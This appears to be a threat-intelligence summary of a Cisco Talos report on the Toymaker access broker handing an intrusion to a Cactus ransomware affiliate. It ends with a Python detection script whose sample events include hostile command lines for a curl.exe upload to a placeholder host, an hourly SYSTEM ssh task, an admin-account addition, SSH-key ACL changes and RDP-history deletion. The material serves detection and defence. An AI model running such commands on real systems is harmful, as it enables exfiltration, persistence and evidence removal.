2025-05-01

An Initial Access Broker Facilitates a Cactus Ransomware Intrusion in Multi-Phase Breach

Level: Tactical | Source: Cisco Talos | Global


An intrusion enabled by an initial access broker (IAB) tracked as Toymaker led to the deployment of Cactus ransomware against a critical infrastructure organization in 2023. Cisco Talos reported on the intrusion, which involved both threat actors. The campaign began when Toymaker compromised the target environment and deployed a custom backdoor named LAGTOY. This implant served as the foothold and was maintained through persistence mechanisms. After initial enumeration and credential harvesting, the attackers remained inactive for three weeks. Activity resumed when access was handed off to a Cactus ransomware affiliate, who initiated a twelve-day operational window that included reconnaissance, credential abuse, data exfiltration, and eventual ransomware deployment.

Toymaker's intrusion spanned only a few days and focused on swift enumeration, persistence, and setup. Enumeration was performed using native Windows commands including "whoami," "net," "nltest," and "ipconfig." The actor created a new user account named "support" and added it to the local administrators group. To establish control, an SSH listener was configured using OpenSSH, and memory was dumped via Magnet RAM Capture. The dump was archived using 7za and exfiltrated with PuTTY's SCP utility. The LAGTOY backdoor was installed and persisted as a Windows service named "WmiPrvSV," with hardcoded C2 communication over TCP port 443. Notably, LAGTOY incorporated custom time-based execution logic and anti-debugging protections. Cisco Talos notes, "LAGTOY uses a unique time-based logic to decide whether it needs to execute commands or Sleep for a specific time period. Talos assesses with high confidence that this logic is a novel custom built unique to the LAGTOY family of implants."

The Cactus affiliate initiated activity three weeks after Toymaker's access, conducting reconnaissance through PowerShell scripts to enumerate remote endpoints and storing the results in CSV files. These artifacts were archived using 7-Zip and exfiltrated using "curl.exe." Registry modifications were made to clear run history and RDP connection traces. The enumeration and cleanup activity occupied the first two of the twelve days before ransomware deployment. On the fourth day, data exfiltration began, using tools such as WinSCP to extract files. Scheduled tasks were created for persistence and tunneling, including hourly SSH-based reverse connections run as system-level jobs. Permissions on SSH key files were modified with "icacls" to restrict visibility and obstruct analysis.

Additional activity included the use of remote administration tools such as AnyDesk, eHorus Agent, OpenSSH, and Windows Admin (RMS Remote Admin). The affiliate created new accounts such as "whiteninja" and modified boot settings to force entry into Safe Mode. Metasploit was used to deploy shellcode-injected versions of binaries like PuTTY and ApacheBench, which communicated over multiple ports with actor-controlled infrastructure. The actor’s behavior—particularly the exfiltration of organizational and customer data and the removal of forensic artifacts—aligned with known double-extortion tactics. Cisco Talos’ reporting of this coordinated campaign illustrates the operational link between initial access brokers and ransomware affiliates.
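As an added example (not code from the Talos report or from this page), the following Python pass evaluates a handful of detections for the behaviours described in the Toymaker phase (the "support" account, the "WmiPrvSV" service) and the Cactus phase (hourly SSH task, icacls on SSH keys, curl.exe exfiltration, RDP/run-history cleanup) against constructed endpoint events. The event schema, the sample command lines, the placeholder host names and the specific registry key are assumptions for illustration.

```python
"""Detection pass over constructed endpoint telemetry for the Toymaker/Cactus TTPs above."""
import re

# Events are constructed stand-ins for process-creation and service-install
# records: 'type' ("process" or "service"), 'cmd' (command line), 'svc' (service name).
def cmd_rule(pattern):
    """Build a predicate that matches a regex against process command lines."""
    rx = re.compile(pattern, re.I)
    return lambda e: e["type"] == "process" and bool(rx.search(e["cmd"]))

RULES = [
    ("net.exe adds account to local Administrators (Toymaker 'support' user)",
     cmd_rule(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add")),
    ("service named WmiPrvSV (LAGTOY persistence; legitimate host is WmiPrvSE)",
     lambda e: e["type"] == "service" and e["svc"].lower() == "wmiprvsv"),
    ("hourly scheduled task running ssh (reverse-connection persistence)",
     cmd_rule(r"\bschtasks(\.exe)?\s+/create\b.*\s/sc\s+hourly\b.*\bssh\b")),
    ("icacls applied to SSH key material (anti-analysis ACL change)",
     cmd_rule(r"\bicacls(\.exe)?\b.*(\.ssh\\|id_rsa|id_ed25519)")),
    ("curl.exe upload (exfiltration of archived enumeration output)",
     cmd_rule(r"\bcurl(\.exe)?\b.*(\s-T\s|--upload-file|\s-F\s)")),
    ("reg delete on RunMRU / Terminal Server Client history (trace cleanup)",
     cmd_rule(r"\breg(\.exe)?\s+delete\b.*(RunMRU|Terminal Server Client)")),
]

def scan(events):
    """Return [(event id, finding label)] for every event that matches a rule."""
    return [(ev["id"], label) for ev in events for label, pred in RULES if pred(ev)]

# Constructed sample telemetry; none of these lines come from the Talos report.
SAMPLE = [
    {"id": 1, "type": "process", "svc": "", "cmd": "whoami /all"},
    {"id": 2, "type": "process", "svc": "", "cmd": "net localgroup administrators support /add"},
    {"id": 3, "type": "service", "svc": "WmiPrvSV", "cmd": ""},
    {"id": 4, "type": "service", "svc": "WmiPrvSE", "cmd": ""},  # benign WMI provider host
    {"id": 5, "type": "process", "svc": "",
     "cmd": 'schtasks /create /sc hourly /tn Sync /tr "ssh -N placeholder-host" /ru SYSTEM'},
    {"id": 6, "type": "process", "svc": "",
     "cmd": r"icacls C:\Users\whiteninja\.ssh\id_rsa /inheritance:r /grant:r whiteninja:F"},
    {"id": 7, "type": "process", "svc": "", "cmd": "curl.exe -T hosts.7z https://placeholder.invalid/up"},
    {"id": 8, "type": "process", "svc": "",
     "cmd": r'reg delete "HKCU\Software\Microsoft\Terminal Server Client\Default" /va /f'},
]

if __name__ == "__main__":
    for eid, label in scan(SAMPLE):
        print(f"event {eid}: {label}")
```

The benign "WmiPrvSE" service and the plain "whoami" call are included to show that the rules key on the specific names and flags rather than on the tool alone.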
